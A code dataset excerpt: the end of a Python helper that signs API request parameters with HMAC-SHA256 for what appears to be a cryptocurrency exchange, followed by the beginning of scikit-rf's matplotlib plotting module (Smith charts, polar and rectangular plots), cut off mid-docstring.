logging.getLogger().setLevel(logging.DEBUG)\n# requests_log = logging.getLogger(\"requests.packages.urllib3\")\n# requests_log.setLevel(logging.DEBUG)\n# requests_log.propagate = True\n\n# generate_param_body(True) generate signed signature key with only timestamp\n# generate_param_body(True, foo1=bar1, foo2=bar2) signed with parameters\n# generate_param_body(False, foo1=bar1, foo2=bar2) unsigned with parameters)\n# generate_param_body(foo1=bar1, foo2=bar2) unsigned with parameters\n# generate_param_body() unsigned no parameters\ndef generate_param(signature=False, **kwargs):\n x = dict(generate_param_body(dict(kwargs), signature))\n return x\n\ndef generate_param_body(param_dict, signature):\n timestamp=str(general.servertime())\n param_dict['timestamp']=timestamp\n if signature:\n param_dict['signature']=generate_signature(param_dict)\n print ('BODY TRUE: ', param_dict )\n return param_dict\n else:\n print ('BODY FALSE: ', param_dict )\n return param_dict\n\ndef generate_signature(query_dict):\n tmp_query_string=''\n for x in query_dict.keys():\n tmp_query_string+=x+'='+query_dict[x]+'&'\n tmp_query_string=tmp_query_string[:-1]\n return hmac.new(get_api_secret().encode('utf-8'), tmp_query_string.encode('utf-8'), sha256).hexdigest()\n\n # # hardcoded values from API example\n # print (tmp_query_string, get_api_secret())\n # tmp_query=b'symbol=LTCBTC&side=BUY&type=LIMIT&timeInForce=GTC&quantity=1&price=0.1&recvWindow=5000×tamp=1499827319559'\n # tmp_secret=b'NhqPtmdSJYdKjVHjA7PZj4Mge3R5YNiP1e3UZjInClVN65XAbvqqM6A7H5fATj0j'\n # return hmac.new(tmp_secret, tmp_query, hashlib.sha256).hexdigest()\n\nif __name__ == \"__main__\":\n print( generate_param(True) )\n\n # print (os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n # print (config.binance().get('SECRET'))\n","sub_path":"lib/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"209504337","text":"\"\"\"\nplotting (:mod:`skrf.plotting`)\n========================================\n\n\nThis module provides general plotting functions.\n\nPlots and Charts\n------------------\n\n.. autosummary::\n :toctree: generated/\n\n smith\n plot_smith\n plot_rectangular\n plot_polar\n plot_complex_rectangular\n plot_complex_polar\n plot_v_frequency\n plot_it_all\n\n plot_minmax_bounds_component\n plot_minmax_bounds_s_db\n plot_minmax_bounds_s_db10\n plot_minmax_bounds_s_time_db\n\n plot_uncertainty_bounds_component\n plot_uncertainty_bounds_s\n plot_uncertainty_bounds_s_db\n plot_uncertainty_bounds_s_time_db\n\n plot_passivity\n plot_logsigma\n\n plot_circuit_graph\n\n plot_contour\n\nConvenience plotting functions\n-------------------------------\n.. autosummary::\n :toctree: generated/\n\n stylely\n subplot_params\n shade_bands\n save_all_figs\n scale_frequency_ticks\n add_markers_to_lines\n legend_off\n func_on_all_figs\n scrape_legend\n signature\n\n\"\"\"\nfrom . constants import NumberLike\nfrom numbers import Number\nfrom typing import Callable, Tuple, Union, List\nimport os\nimport warnings\n\nimport numpy as npy\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib import ticker, rcParams\nfrom matplotlib.patches import Circle # for drawing smith chart\nfrom matplotlib.pyplot import quiver\nfrom matplotlib.dates import date2num\nimport matplotlib.tri as tri\n\nfrom . import network, frequency, calibration, networkSet, circuit\nfrom . import mathFunctions as mf\nfrom . util import now_string_2_dt\n\ntry:\n import networkx as nx\nexcept ImportError as e:\n pass\n\nSI_PREFIXES_ASCII = 'yzafpnum kMGTPEZY'\nSI_CONVERSION = {key: 10**((8-i)*3) for i, key in enumerate(SI_PREFIXES_ASCII)}\n\n\ndef scale_frequency_ticks(ax: plt.Axes, funit: str):\n \"\"\"\n Scale frequency axis ticks.\n\n Parameters\n ----------\n ax : plt.Axes\n Matplotlib figure axe\n funit : str\n frequency unit string as in :data:`~skrf.frequency.Frequency.unit`\n\n Raises\n ------\n ValueError\n if invalid unit is passed\n \"\"\"\n if funit.lower() == \"hz\":\n prefix = \" \"\n scale = 1\n elif len(funit) == 3:\n prefix = funit[0]\n scale = SI_CONVERSION[prefix]\n else:\n raise ValueError(f\"invalid funit {funit}\")\n ticks_x = ticker.FuncFormatter(lambda x, pos: f'{x * scale:g}')\n ax.xaxis.set_major_formatter(ticks_x)\n\n\ndef smith(smithR: Number = 1, chart_type: str = 'z', draw_labels: bool = False,\n border: bool = False, ax: Union[plt.Axes, None] = None, ref_imm: float = 1.0,\n draw_vswr: Union[List, bool, None] = None):\n \"\"\"\n Plot the Smith chart of a given radius.\n\n The Smith chart is used to assist in solving problems with transmission lines\n and matching circuits. It can be used to simultaneously display multiple\n parameters including impedances, admittances, reflection coefficients,\n scattering parameters, noise figure circles, etc. [#]_\n\n Parameters\n ----------\n smithR : number, optional\n radius of smith chart. Default is 1.\n chart_type : str, optional\n Contour type. Default is 'z'. Possible values are:\n\n * *'z'* : lines of constant impedance\n * *'y'* : lines of constant admittance\n * *'zy'* : lines of constant impedance stronger than admittance\n * *'yz'* : lines of constant admittance stronger than impedance\n draw_labels : Boolean, optional\n annotate real and imaginary parts of impedance on the\n chart (only if smithR=1).\n Default is False.\n border : Boolean, optional.\n draw a rectangular border with axis ticks, around the perimeter\n of the figure. Not used if draw_labels = True.\n Default is False.\n ax : :class:`matplotlib.pyplot.Axes` or None, optional\n existing axes to draw smith chart on.\n Default is None (creates a new figure)\n ref_imm : number, optional\n Reference immittance for center of Smith chart. Only changes\n labels, if printed.\n Default is 1.0.\n draw_vswr : list of numbers, Boolean or None, optional\n draw VSWR circles. If True, default values are used.\n Default is None.\n\n References\n ----------\n .. [#] https://en.wikipedia.org/wiki/Smith_chart\n\n \"\"\"\n ##TODO: fix this function so it doesnt suck\n if ax is None:\n ax1 = plt.gca()\n else:\n ax1 = ax\n\n # contour holds matplotlib instances of: pathes.Circle, and lines.Line2D, which\n # are the contours on the smith chart\n contour = []\n\n # these are hard-coded on purpose,as they should always be present\n rHeavyList = [0,1]\n xHeavyList = [1,-1]\n\n #TODO: fix this\n # these could be dynamically coded in the future, but work good'nuff for now\n if not draw_labels:\n rLightList = npy.logspace(3,-5,9,base=.5)\n xLightList = npy.hstack([npy.logspace(2,-5,8,base=.5), -1*npy.logspace(2,-5,8,base=.5)])\n else:\n rLightList = npy.array( [ 0.2, 0.5, 1.0, 2.0, 5.0 ] )\n xLightList = npy.array( [ 0.2, 0.5, 1.0, 2.0 , 5.0, -0.2, -0.5, -1.0, -2.0, -5.0 ] )\n\n # vswr lines\n if isinstance(draw_vswr, (tuple,list)):\n vswrVeryLightList = draw_vswr\n elif draw_vswr is True:\n # use the default I like\n vswrVeryLightList = [1.5, 2.0, 3.0, 5.0]\n else:\n vswrVeryLightList = []\n\n # cheap way to make a ok-looking smith chart at larger than 1 radii\n if smithR > 1:\n rMax = (1.+smithR)/(1.-smithR)\n rLightList = npy.hstack([ npy.linspace(0,rMax,11) , rLightList ])\n\n if chart_type.startswith('y'):\n y_flip_sign = -1\n else:\n y_flip_sign = 1\n\n # draw impedance and/or admittance\n both_charts = chart_type in ('zy', 'yz')\n\n\n # loops through Verylight, Light and Heavy lists and draws circles using patches\n # for analysis of this see R.M. Weikles Microwave II notes (from uva)\n\n superLightColor = dict(ec='whitesmoke', fc='none')\n veryLightColor = dict(ec='lightgrey', fc='none')\n lightColor = dict(ec='grey', fc='none')\n heavyColor = dict(ec='black', fc='none')\n\n # vswr circles verylight\n for vswr in vswrVeryLightList:\n radius = (vswr-1.0) / (vswr+1.0)\n contour.append( Circle((0, 0), radius, **veryLightColor))\n\n # impedance/admittance circles\n for r in rLightList:\n center = (r/(1.+r)*y_flip_sign,0 )\n radius = 1./(1+r)\n if both_charts:\n contour.insert(0, Circle((-center[0], center[1]), radius, **superLightColor))\n contour.append(Circle(center, radius, **lightColor))\n for x in xLightList:\n center = (1*y_flip_sign,1./x)\n radius = 1./x\n if both_charts:\n contour.insert(0, Circle( (-center[0], center[1]), radius, **superLightColor))\n contour.append(Circle(center, radius, **lightColor))\n\n for r in rHeavyList:\n center = (r/(1.+r)*y_flip_sign,0 )\n radius = 1./(1+r)\n contour.append(Circle(center, radius, **heavyColor))\n for x in xHeavyList:\n center = (1*y_flip_sign,1./x)\n radius = 1./x\n contour.append(Circle(center, radius, **heavyColor))\n\n # clipping circle\n clipc = Circle( [0,0], smithR, ec='k',fc='None',visible=True)\n ax1.add_patch( clipc)\n\n #draw x and y axis\n ax1.axhline(0, color='k', lw=.1, clip_path=clipc)\n ax1.axvline(1*y_flip_sign, color='k', clip_path=clipc)\n ax1.grid(0)\n # Set axis limits by plotting white points so zooming works properly\n ax1.plot(smithR*npy.array([-1.1, 1.1]), smithR*npy.array([-1.1, 1.1]), 'w.', markersize = 0)\n ax1.axis('image') # Combination of 'equal' and 'tight'\n\n\n if not border:\n ax1.yaxis.set_ticks([])\n ax1.xaxis.set_ticks([])\n for loc, spine in ax1.spines.items():\n spine.set_color('none')\n\n\n if draw_labels:\n #Clear axis\n ax1.yaxis.set_ticks([])\n ax1.xaxis.set_ticks([])\n for loc, spine in ax1.spines.items():\n spine.set_color('none')\n\n # Make annotations only if the radius is 1\n if smithR == 1:\n #Make room for annotation\n ax1.plot(npy.array([-1.25, 1.25]), npy.array([-1.1, 1.1]), 'w.', markersize = 0)\n ax1.axis('image')\n\n #Annotate real part\n for value in rLightList:\n # Set radius of real part's label; offset slightly left (Z\n # chart, y_flip_sign == 1) or right (Y chart, y_flip_sign == -1)\n # so label doesn't overlap chart's circles\n rho = (value - 1)/(value + 1) - y_flip_sign*0.01\n if y_flip_sign == 1:\n halignstyle = \"right\"\n else:\n halignstyle = \"left\"\n if y_flip_sign == -1: # 'y' and 'yz' charts\n value = 1/value\n ax1.annotate(str(value*ref_imm), xy=(rho*smithR, 0.01),\n xytext=(rho*smithR, 0.01), ha = halignstyle, va = \"baseline\")\n\n #Annotate imaginary part\n radialScaleFactor = 1.01 # Scale radius of label position by this\n # factor. Making it >1 places the label\n # outside the Smith chart's circle\n for value in xLightList:\n #Transforms from complex to cartesian\n S = (1j*value - 1) / (1j*value + 1)\n S *= smithR * radialScaleFactor\n rhox = S.real\n rhoy = S.imag * y_flip_sign\n\n # Choose alignment anchor point based on label's value\n if ((value == 1.0) or (value == -1.0)):\n halignstyle = \"center\"\n elif (rhox < 0.0):\n halignstyle = \"right\"\n else:\n halignstyle = \"left\"\n\n if (rhoy < 0):\n valignstyle = \"top\"\n else:\n valignstyle = \"bottom\"\n if y_flip_sign == -1: # 'y' and 'yz' charts\n value = 1/value\n #Annotate value\n ax1.annotate(str(value*ref_imm) + 'j', xy=(rhox, rhoy),\n xytext=(rhox, rhoy), ha = halignstyle, va = valignstyle)\n\n #Annotate 0 and inf\n if y_flip_sign == 1: # z and zy charts\n label_left, label_right = '0.0', r'$\\infty$'\n else: # y and yz charts\n label_left, label_right = r'$\\infty$', '0.0'\n ax1.annotate(label_left, xy=(-1.02, 0), xytext=(-1.02, 0),\n ha = \"right\", va = \"center\")\n ax1.annotate(label_right, xy=(radialScaleFactor, 0), xytext=(radialScaleFactor, 0),\n ha = \"left\", va = \"center\")\n\n # annotate vswr circles\n for vswr in vswrVeryLightList:\n rhoy = (vswr-1.0) / (vswr+1.0)\n\n ax1.annotate(str(vswr), xy=(0, rhoy*smithR),\n xytext=(0, rhoy*smithR), ha=\"center\", va=\"bottom\",\n color='grey', size='smaller')\n\n # loop though contours and draw them on the given axes\n for currentContour in contour:\n cc=ax1.add_patch(currentContour)\n cc.set_clip_path(clipc)\n\n\ndef plot_rectangular(x: NumberLike, y: NumberLike,\n x_label: Union[str, None] = None, y_label: Union[str, None] = None,\n title: Union[str, None] = None, show_legend: bool = True,\n axis: str = 'tight', ax: Union[plt.Axes, None] = None,\n *args, **kwargs):\n r\"\"\"\n Plot rectangular data and optionally label axes.\n\n Parameters\n ----------\n x : array-like, of complex data\n data to plot\n y : array-like, of complex data\n data to plot\n x_label : string or None, optional.\n x-axis label. Default is None.\n y_label : string or None, optional.\n y-axis label. Default is None.\n title : string or None, optional.\n plot title. Default is None.\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n axis : str, optional\n whether or not to autoscale the axis. Default is 'tight'\n ax : :class:`matplotlib.axes.AxesSubplot` object or None, optional.\n axes to draw on. Default is None (creates a new figure)\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n \"\"\"\n if ax is None:\n ax = plt.gca()\n\n my_plot = ax.plot(x, y, *args, **kwargs)\n\n if x_label is not None:\n ax.set_xlabel(x_label)\n\n if y_label is not None:\n ax.set_ylabel(y_label)\n\n if title is not None:\n ax.set_title(title)\n\n if show_legend:\n # only show legend if they provide a label\n if 'label' in kwargs:\n ax.legend()\n\n if axis is not None:\n ax.autoscale(True, 'x', True)\n ax.autoscale(True, 'y', False)\n\n if plt.isinteractive():\n plt.draw()\n\n return my_plot\n\n\ndef plot_polar(theta: NumberLike, r: NumberLike,\n x_label: Union[str, None] = None, y_label: Union[str, None] = None,\n title: Union[str, None] = None, show_legend: bool = True,\n axis_equal: bool = False, ax: Union[plt.Axes, None] = None,\n *args, **kwargs):\n r\"\"\"\n Plot polar data on a polar plot and optionally label axes.\n\n Parameters\n ----------\n theta : array-like\n angular data to plot\n r : array-like\n radial data to plot\n x_label : string or None, optional\n x-axis label. Default is None.\n y_label : string or None, optional.\n y-axis label. Default is None\n title : string or None, optional.\n plot title. Default is None.\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n ax : :class:`matplotlib.axes.AxesSubplot` object or None.\n axes to draw on. Default is None (creates a new figure).\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n See Also\n --------\n plot_rectangular : plots rectangular data\n plot_complex_rectangular : plot complex data on complex plane\n plot_polar : plot polar data\n plot_complex_polar : plot complex data on polar plane\n plot_smith : plot complex data on smith chart\n\n \"\"\"\n if ax is None:\n # no Axes passed\n # if an existing (polar) plot is already present, grab and use its Axes\n # otherwise, create a new polar plot and use that Axes\n if not plt.get_fignums() or not plt.gcf().axes or plt.gca().name != 'polar':\n ax = plt.figure().add_subplot(projection='polar')\n else:\n ax = plt.gca()\n else:\n if ax.name != 'polar':\n # The projection of an existing axes can't be changed,\n # since specifying a projection when creating an axes determines the\n # axes class you get, which is different for each projection type.\n # So, passing a axe projection not polar is probably undesired\n warnings.warn(\n f\"Projection of the Axes passed as `ax` is not 'polar' but is {ax.name}.\" +\n \"See Matplotlib documentation to create a polar plot or call this function without the `ax` parameter.\"\n )\n\n ax.plot(theta, r, *args, **kwargs)\n\n if x_label is not None:\n ax.set_xlabel(x_label)\n\n if y_label is not None:\n ax.set_ylabel(y_label)\n\n if title is not None:\n ax.set_title(title)\n\n if show_legend:\n # only show legend if they provide a label\n if 'label' in kwargs:\n ax.legend()\n\n if axis_equal:\n ax.axis('equal')\n\n if plt.isinteractive():\n plt.draw()\n\n\ndef plot_complex_rectangular(z: NumberLike,\n x_label: str = 'Real', y_label: str = 'Imag',\n title: str = 'Complex Plane', show_legend: bool = True,\n axis: str = 'equal', ax: Union[plt.Axes, None] = None,\n *args, **kwargs):\n r\"\"\"\n Plot complex data on the complex plane.\n\n Parameters\n ----------\n z : array-like, of complex data\n data to plot\n x_label : string, optional.\n x-axis label. Default is 'Real'.\n y_label : string, optional.\n y-axis label. Default is 'Imag'.\n title : string, optional.\n plot title. Default is 'Complex Plane'\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n ax : :class:`matplotlib.axes.AxesSubplot` object or None.\n axes to draw on. Default is None (creates a new figure)\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n See Also\n --------\n plot_rectangular : plots rectangular data\n plot_complex_rectangular : plot complex data on complex plane\n plot_polar : plot polar data\n plot_complex_polar : plot complex data on polar plane\n plot_smith : plot complex data on smith chart\n\n \"\"\"\n x = npy.real(z)\n y = npy.imag(z)\n plot_rectangular(x=x, y=y, x_label=x_label, y_label=y_label,\n title=title, show_legend=show_legend, axis=axis,\n ax=ax, *args, **kwargs)\n\n\ndef plot_complex_polar(z: NumberLike,\n x_label: Union[str, None] = None, y_label: Union[str, None] = None,\n title: Union[str, None] = None, show_legend: bool = True,\n axis_equal: bool = False, ax: Union[plt.Axes, None] = None,\n *args, **kwargs):\n r\"\"\"\n Plot complex data in polar format.\n\n Parameters\n ----------\n z : array-like, of complex data\n data to plot\n x_label : string or None, optional\n x-axis label. Default is None.\n y_label : string or None, optional.\n y-axis label. Default is None\n title : string or None, optional.\n plot title. Default is None.\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n ax : :class:`matplotlib.axes.AxesSubplot` object or None.\n axes to draw on. Default is None (creates a new figure).\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n See Also\n --------\n plot_rectangular : plots rectangular data\n plot_complex_rectangular : plot complex data on complex plane\n plot_polar : plot polar data\n plot_complex_polar : plot complex data on polar plane\n plot_smith : plot complex data on smith chart\n \"\"\"\n theta = npy.angle(z)\n r = npy.abs(z)\n plot_polar(theta=theta, r=r, x_label=x_label, y_label=y_label,\n title=title, show_legend=show_legend, axis_equal=axis_equal,\n ax=ax, *args, **kwargs)\n\n\ndef plot_smith(s: NumberLike, smith_r: float = 1, chart_type: str = 'z',\n x_label: str = 'Real', y_label: str = 'Imaginary', title: str = 'Complex Plane',\n show_legend: bool = True, axis: str = 'equal', ax: Union[plt.Axes, None] = None,\n force_chart: bool = False, draw_vswr: Union[List, bool, None] = None, draw_labels: bool = False,\n *args, **kwargs):\n r\"\"\"\n Plot complex data on smith chart.\n\n Parameters\n ------------\n s : complex array-like\n reflection-coefficient-like data to plot\n smith_r : number\n radius of smith chart\n chart_type : str in ['z','y']\n Contour type for chart.\n * *'z'* : lines of constant impedance\n * *'y'* : lines of constant admittance\n x_label : string, optional.\n x-axis label. Default is 'Real'.\n y_label : string, optional.\n y-axis label. Default is 'Imaginary'\n title : string, optional.\n plot title, Default is 'Complex Plane'.\n show_legend : Boolean, optional.\n controls the drawing of the legend. Default is True.\n axis_equal: Boolean, optional.\n sets axis to be equal increments. Default is 'equal'.\n ax : :class:`matplotlib.axes.AxesSubplot` object or None.\n axes to draw on. Default is None (creates a new figure).\n force_chart : Boolean, optional.\n forces the re-drawing of smith chart. Default is False.\n draw_vswr : list of numbers, Boolean or None, optional\n draw VSWR circles. If True, default values are used.\n Default is None.\n draw_labels : Boolean\n annotate chart with impedance values\n \\*args, \\*\\*kwargs : passed to pylab.plot\n\n See Also\n ----------\n plot_rectangular : plots rectangular data\n plot_complex_rectangular : plot complex data on complex plane\n plot_polar : plot polar data\n plot_complex_polar : plot complex data on polar plane\n plot_smith : plot complex data on smith chart\n \"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n # test if smith chart is already drawn\n if not force_chart:\n if len(ax.patches) == 0:\n smith(ax=ax, smithR = smith_r, chart_type=chart_type, draw_vswr=draw_vswr, draw_labels=draw_labels)\n\n plot_complex_rectangular(s, x_label=x_label, y_label=y_label,\n title=title, show_legend=show_legend, axis=axis,\n ax=ax, *args, **kwargs)\n\n ax.axis(smith_r*npy.array([-1.1, 1.1, -1.1, 1.1]))\n if plt.isinteractive():\n plt.draw()\n\n\ndef subplot_params(ntwk, param: str = 's', proj: str = 'db',\n size_per_port: int = 4, newfig: bool = True,\n add_titles: bool = True, keep_it_tight: bool = True,\n subplot_kw: dict = {},\n *args, **kw):\n \"\"\"\n Plot all networks parameters individually on subplots.\n\n Parameters\n ----------\n ntwk : :class:`~skrf.network.Network`\n Network to get data from.\n param : str, optional\n Parameter to plot, by default 's'\n proj : str, optional\n Projection type, by default 'db'\n size_per_port : int, optional\n by default 4\n newfig : bool, optional\n by default True\n add_titles : bool, optional\n by default True\n keep_it_tight : bool, optional\n by default True\n subplot_kw : dict, optional\n by default {}\n\n Returns\n -------\n f : :class:`matplotlib.pyplot.Figure`\n Matplotlib Figure\n ax : :class:`matplotlib.pyplot.Axes`\n Matplotlib Axes\n\n \"\"\"\n if newfig:\n f,axs= plt.subplots(ntwk.nports,ntwk.nports,\n figsize =(size_per_port*ntwk.nports,\n size_per_port*ntwk.nports ),\n **subplot_kw)\n else:\n f = plt.gcf()\n axs = npy.array(f.get_axes())\n\n for ports,ax in zip(ntwk.port_tuples, axs.flatten()):\n plot_func = ntwk.__getattribute__('plot_%s_%s'%(param, proj))\n plot_func(m=ports[0], n=ports[1], ax=ax,*args, **kw)\n if add_titles:\n ax.set_title('%s%i%i'%(param.upper(),ports[0]+1, ports[1]+1))\n if keep_it_tight:\n plt.tight_layout()\n return f, axs\n\n\ndef shade_bands(edges: NumberLike, y_range: Union[Tuple, None] = None,\n cmap: str = 'prism', **kwargs):\n r\"\"\"\n Shades frequency bands.\n\n When plotting data over a set of frequency bands it is nice to\n have each band visually separated from the other. The kwarg `alpha`\n is useful.\n\n Parameters\n ----------\n edges : array-like\n x-values separating regions of a given shade\n y_range : tuple or None, optional.\n y-values to shade in. Default is None.\n cmap : str, optional.\n see matplotlib.cm or matplotlib.colormaps for acceptable values.\n Default is 'prism'.\n \\*\\*kwargs : key word arguments\n passed to `matplotlib.fill_between`\n\n Examples\n --------\n >>> rf.shade_bands([325,500,750,1100], alpha=.2)\n \"\"\"\n cmap = plt.cm.get_cmap(cmap)\n if not isinstance(y_range, (tuple, list)) or (len(y_range) != 2):\n y_range=plt.gca().get_ylim()\n axis = plt.axis()\n for k in range(len(edges)-1):\n plt.fill_between(\n [edges[k],edges[k+1]],\n y_range[0], y_range[1],\n color = cmap(1.0*k/len(edges)),\n **kwargs)\n plt.axis(axis)\n\n\ndef save_all_figs(dir: str = './', format: Union[None, List[str]] = None,\n replace_spaces: bool = True, echo: bool = True):\n \"\"\"\n Save all open Figures to disk.\n\n Parameters\n ----------\n dir : string, optional.\n path to save figures into. Default is './'\n format : None or list of strings, optional.\n the types of formats to save figures as. The elements of this\n list are passed to :func:`matplotlib.pyplot.savefig`. This is a list so that\n you can save each figure in multiple formats. Default is None.\n replace_spaces : bool, optional\n default is True.\n echo : bool, optional.\n True prints filenames as they are saved. Default is True.\n \"\"\"\n if dir[-1] != '/':\n dir = dir + '/'\n for fignum in plt.get_fignums():\n fileName = plt.figure(fignum).get_axes()[0].get_title()\n if replace_spaces:\n fileName = fileName.replace(' ','_')\n if fileName == '':\n fileName = 'unnamedPlot'\n if format is None:\n plt.savefig(dir+fileName)\n if echo:\n print(dir+fileName)\n else:\n for fmt in format:\n plt.savefig(dir+fileName+'.'+fmt, format=fmt)\n if echo:\n print(dir+fileName+'.'+fmt)\nsaf = save_all_figs\n\n\ndef add_markers_to_lines(ax: Union[plt.Axes, None] = None,\n marker_list: List = ['o', 'D', 's', '+', 'x'],\n markevery: int = 10):\n \"\"\"\n Add markers to existing lings on a plot.\n\n Convenient if you have already have a plot made, but then\n need to add markers afterwards, so that it can be interpreted in\n black and white. The markevery argument makes the markers less\n frequent than the data, which is generally what you want.\n\n Parameters\n ----------\n ax : matplotlib.Axes or None, optional\n axis which to add markers to.\n Default is current axe gca()\n marker_list : list of string, optional\n list of marker characters. Default is ['o', 'D', 's', '+', 'x'].\n see matplotlib.plot help for possible marker characters\n markevery : int, optional.\n markevery number of points with a marker.\n Default is 10.\n\n \"\"\"\n if ax is None:\n ax=plt.gca()\n lines = ax.get_lines()\n if len(lines) > len (marker_list ):\n marker_list *= 3\n [k[0].set_marker(k[1]) for k in zip(lines, marker_list)]\n [line.set_markevery(markevery) for line in lines]\n\n\ndef legend_off(ax: Union[plt.Axes, None] = None):\n \"\"\"\n Turn off the legend for a given axes.\n\n If no axes is given then it will use current axes.\n\n Parameters\n ----------\n ax : matplotlib.Axes or None, optional\n axis to operate on.\n Default is None for current axe gca()\n \"\"\"\n if ax is None:\n plt.gca().legend_.set_visible(0)\n else:\n ax.legend_.set_visible(0)\n\n\ndef scrape_legend(n: Union[int, None] = None,\n ax: Union[plt.Axes, None] = None):\n \"\"\"\n Scrape a legend with redundant labels.\n\n Given a legend of m entries of n groups, this will remove all but\n every m/nth entry. This is used when you plot many lines representing\n the same thing, and only want one label entry in the legend for the\n whole ensemble of lines.\n\n Parameters\n ----------\n n : int or None, optional.\n Default is None.\n ax : matplotlib.Axes or None, optional\n axis to operate on.\n Default is None for current axe gca()\n \"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n handles, labels = ax.get_legend_handles_labels()\n\n if n is None:\n n =len ( set(labels))\n\n if n>len(handles):\n raise ValueError('number of entries is too large')\n\n k_list = [int(k) for k in npy.linspace(0,len(handles)-1,n)]\n ax.legend([handles[k] for k in k_list], [labels[k] for k in k_list])\n\n\ndef func_on_all_figs(func: Callable, *args, **kwargs):\n r\"\"\"\n Run a function after making all open figures current.\n\n Useful if you need to change the properties of many open figures\n at once, like turn off the grid.\n\n Parameters\n ----------\n func : function\n function to call\n \\*args, \\*\\*kwargs : passed to func\n\n Examples\n --------\n >>> rf.func_on_all_figs(grid, alpha=.3)\n \"\"\"\n for fig_n in plt.get_fignums():\n fig = plt.figure(fig_n)\n for ax_n in fig.axes:\n fig.add_axes(ax_n) # trick to make axes current\n func(*args, **kwargs)\n plt.draw()\n\nfoaf = func_on_all_figs\n\n\ndef plot_vector(a: complex, off: complex = 0+0j, *args, **kwargs):\n \"\"\"\n Plot a 2d vector.\n\n Parameters\n ----------\n a : complex\n complex coordinates (real for X, imag for Y) of the arrow location.\n off : complex, optional\n complex direction (real for U, imag for V) components\n of the arrow vectors, by default 0+0j\n\n Returns\n -------\n quiver : matplotlib.pyplot.quiver\n \"\"\"\n return quiver(off.real, off.imag, a.real, a.imag, scale_units='xy',\n angles='xy', scale=1, *args, **kwargs)\n\n\ndef colors() -> List[str]:\n \"\"\"\n Return the list of colors of the rcParams color cycle.\n\n Returns\n -------\n colors : List[str]\n \"\"\"\n return [c['color'] for c in rcParams['axes.prop_cycle']]\n\n\nPRIMARY_PROPERTIES = network.PRIMARY_PROPERTIES\nCOMPONENT_FUNC_DICT = network.COMPONENT_FUNC_DICT\nY_LABEL_DICT = network.Y_LABEL_DICT\n\n\n# TODO: remove this as it takes up ~70% cpu time of this init\ndef setup_matplotlib_plotting():\n frequency.Frequency.labelXAxis = labelXAxis\n frequency.Frequency.plot = plot_v_frequency\n\n __generate_plot_functions(network.Network)\n network.Network.plot = plot\n network.Network.plot_passivity = plot_passivity\n network.Network.plot_reciprocity = plot_reciprocity\n network.Network.plot_reciprocity2 = plot_reciprocity2\n network.Network.plot_s_db_time = plot_s_db_time\n network.Network.plot_s_smith = plot_s_smith\n network.Network.plot_it_all = plot_it_all\n\n calibration.Calibration.plot_errors = plot_calibration_errors\n calibration.Calibration.plot_caled_ntwks = plot_caled_ntwks\n calibration.Calibration.plot_residuals = plot_residuals\n\n networkSet.NetworkSet.animate = animate\n networkSet.NetworkSet.plot_uncertainty_bounds_component = plot_uncertainty_bounds_component\n networkSet.NetworkSet.plot_minmax_bounds_component = plot_minmax_bounds_component\n networkSet.NetworkSet.plot_uncertainty_bounds_s_db = plot_uncertainty_bounds_s_db\n networkSet.NetworkSet.plot_minmax_bounds_s_db = plot_minmax_bounds_s_db\n networkSet.NetworkSet.plot_minmax_bounds_s_db10 = plot_minmax_bounds_s_db10\n networkSet.NetworkSet.plot_uncertainty_bounds_s_time_db = plot_uncertainty_bounds_s_time_db\n networkSet.NetworkSet.plot_minmax_bounds_s_time_db = plot_minmax_bounds_s_time_db\n networkSet.NetworkSet.plot_uncertainty_decomposition = plot_uncertainty_decomposition\n networkSet.NetworkSet.plot_uncertainty_bounds_s = plot_uncertainty_bounds_s\n networkSet.NetworkSet.plot_logsigma = plot_logsigma\n networkSet.NetworkSet.signature = signature\n\n circuit.Circuit.plot_graph = plot_circuit_graph\n\ndef __generate_plot_functions(self):\n \"\"\"\n \"\"\"\n for prop_name in PRIMARY_PROPERTIES:\n\n def plot_prop_polar(self,\n m=None, n=None, ax=None,\n show_legend=True, prop_name=prop_name, *args, **kwargs):\n\n # create index lists, if not provided by user\n if m is None:\n M = range(self.number_of_ports)\n else:\n M = [m]\n if n is None:\n N = range(self.number_of_ports)\n else:\n N = [n]\n\n if 'label' not in kwargs.keys():\n gen_label = True\n else:\n gen_label = False\n\n # was_interactive = plt.isinteractive\n # if was_interactive:\n # plt.interactive(False)\n\n for m in M:\n for n in N:\n # set the legend label for this trace to the networks\n # name if it exists, and they didn't pass a name key in\n # the kwargs\n if gen_label:\n if self.name is None:\n if plt.rcParams['text.usetex']:\n label_string = '$%s_{%i%i}$'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n label_string = '%s%i%i'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n if plt.rcParams['text.usetex']:\n label_string = self.name+', $%s_{%i%i}$'%\\\n (prop_name[0].upper(),m+1,n+1)\n else:\n label_string = self.name+', %s%i%i'%\\\n (prop_name[0].upper(),m+1,n+1)\n kwargs['label'] = label_string\n\n # plot the desired attribute vs frequency\n plot_complex_polar(\n z = getattr(self,prop_name)[:,m,n],\n show_legend = show_legend, ax = ax,\n *args, **kwargs)\n\n # if was_interactive:\n # plt.interactive(True)\n # plt.draw()\n # plt.show()\n\n plot_prop_polar.__doc__ = r\"\"\"\nPlot the Network attribute :attr:`{}` vs frequency.\n\nParameters\n----------\nm : int, optional\n first index of s-parameter matrix, if None will use all\nn : int, optional\n second index of the s-parameter matrix, if None will use all\nax : :class:`matplotlib.Axes` object, optional\n An existing Axes object to plot on\nshow_legend : Boolean\n draw legend or not\nattribute : string\n Network attribute to plot\ny_label : string, optional\n the y-axis label\n\n\\*args,\\**kwargs : arguments, keyword arguments\n passed to :func:`matplotlib.plot`\n\nNote\n----\nThis function is dynamically generated upon Network\ninitialization. This is accomplished by 